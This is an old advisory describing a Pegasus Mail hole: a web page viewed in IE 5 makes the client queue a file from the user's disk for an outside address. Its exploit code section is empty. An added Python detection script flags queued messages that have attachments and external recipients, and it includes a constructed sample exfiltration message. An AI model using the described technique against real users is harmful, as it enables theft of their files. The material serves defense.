[ SOURCE: http://www.secureroot.com/security/advisories/9719820413.html ]

SUMMARY

The default setup of Pegasus Mail contains a remotely exploitable security hole that allows a remote website to obtain copies of files on the user's hard drive.

DETAILS

Version tested: Pegasus Mail v3.12c with IE 5.0

When the web page containing the exploit code is viewed in IE 5, Pegasus Mail automatically creates a message that has a copy of the file "c:\test.txt" attached, is addressed to "hacker@hakersite.com", and is queued ready to be sent, without any further user intervention.

If instead of "hacker@hakersite.com" the recipient is a local user, "hacker", the message is not queued but sent immediately.

Exploit code:

Temporary Fix:

1) Don't run Pegasus Mail at the same time as a web browser.

This is not a complete solution, as Pegasus Mail will be loaded if the exploit code is run, but this will at least be more noticeable to the user.

Vendor:

As I earlier posted a message to vuln-dev giving the basics of this exploit without realizing the consequences (at that stage the user had to click on a link for the exploit to come into play), I have decided to publish the full exploit before contacting the vendor.

-- Imran Ghory
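The DETAILS section describes the observable effect of the hole: a message with a local file attached, addressed to an outside party, appears in the outgoing queue with no user action. One check a practitioner can run against the queue is to flag any queued message that both carries a file attachment and is addressed outside the local domain. The script below is an added example and not part of the original advisory or of Pegasus Mail; it assumes the queue is a directory of plain RFC 822 message files and that the local mail domain is "example.org" (both are assumptions, since the advisory does not describe Pegasus Mail's on-disk queue format). The sample messages are constructed for the example.

```python
"""Added example: scan an outgoing mail queue for messages that carry a file
attachment and are addressed outside the local domain.

Assumptions (not from the advisory): the queue is a directory of plain
RFC 822 message files, and the local mail domain is LOCAL_DOMAIN.
"""
import email
from email import policy
from pathlib import Path

LOCAL_DOMAIN = "example.org"  # assumed local domain for this example


def recipients(msg):
    """Return every address listed in To:, Cc: and Bcc: headers."""
    addrs = []
    for hdr in ("To", "Cc", "Bcc"):
        for value in msg.get_all(hdr, []):
            addrs.extend(a.strip() for a in str(value).split(","))
    return [a for a in addrs if a]


def is_external(addr, local_domain=LOCAL_DOMAIN):
    """True if the address points outside local_domain.

    A bare local name such as "hacker" (no @) is treated as local, matching
    the advisory's "local user" case.
    """
    if "<" in addr and ">" in addr:
        addr = addr[addr.index("<") + 1:addr.index(">")]
    if "@" not in addr:
        return False
    return addr.rsplit("@", 1)[1].lower() != local_domain.lower()


def attachment_names(msg):
    """Filenames of all MIME parts marked as attachments."""
    names = []
    for part in msg.walk():
        if part.get_content_disposition() == "attachment":
            names.append(part.get_filename() or "<unnamed>")
    return names


def classify(raw, local_domain=LOCAL_DOMAIN):
    """Parse one queued message and decide whether it looks like exfiltration:
    at least one external recipient AND at least one file attachment."""
    msg = email.message_from_string(raw, policy=policy.default)
    ext = [a for a in recipients(msg) if is_external(a, local_domain)]
    atts = attachment_names(msg)
    return {"external_recipients": ext,
            "attachments": atts,
            "suspicious": bool(ext and atts)}


def scan_queue(queue_dir, local_domain=LOCAL_DOMAIN):
    """Return (filename, classification) for every suspicious file in queue_dir."""
    hits = []
    for path in sorted(Path(queue_dir).iterdir()):
        if path.is_file():
            result = classify(path.read_text(errors="replace"), local_domain)
            if result["suspicious"]:
                hits.append((path.name, result))
    return hits


# Constructed sample: the queued message the advisory describes.
EXFIL_MESSAGE = (
    "From: victim@example.org\n"
    "To: hacker@hakersite.com\n"
    "MIME-Version: 1.0\n"
    'Content-Type: multipart/mixed; boundary="XX"\n'
    "\n"
    "--XX\n"
    "Content-Type: text/plain\n"
    "\n"
    "\n"
    "--XX\n"
    'Content-Type: text/plain; name="test.txt"\n'
    'Content-Disposition: attachment; filename="test.txt"\n'
    "\n"
    "contents of c:\\test.txt\n"
    "--XX--\n"
)

# Constructed sample: an ordinary internal message with an attachment.
INTERNAL_MESSAGE = EXFIL_MESSAGE.replace(
    "To: hacker@hakersite.com", "To: colleague@example.org")

# Constructed sample: external recipient, but no attachment.
PLAIN_EXTERNAL_MESSAGE = (
    "From: victim@example.org\n"
    "To: friend@elsewhere.net\n"
    "\n"
    "Just text.\n"
)

if __name__ == "__main__":
    for name, raw in (("exfil", EXFIL_MESSAGE),
                      ("internal", INTERNAL_MESSAGE),
                      ("plain-external", PLAIN_EXTERNAL_MESSAGE)):
        print(name, classify(raw))
```

This only covers the first case in the advisory: a message addressed outside the local domain sits in the queue and can be inspected before it leaves. In the second case (a local recipient such as "hacker") the advisory says the message is sent immediately, so nothing ever waits in the queue to be caught; detection there has to happen at the receiving mail store or on the wire.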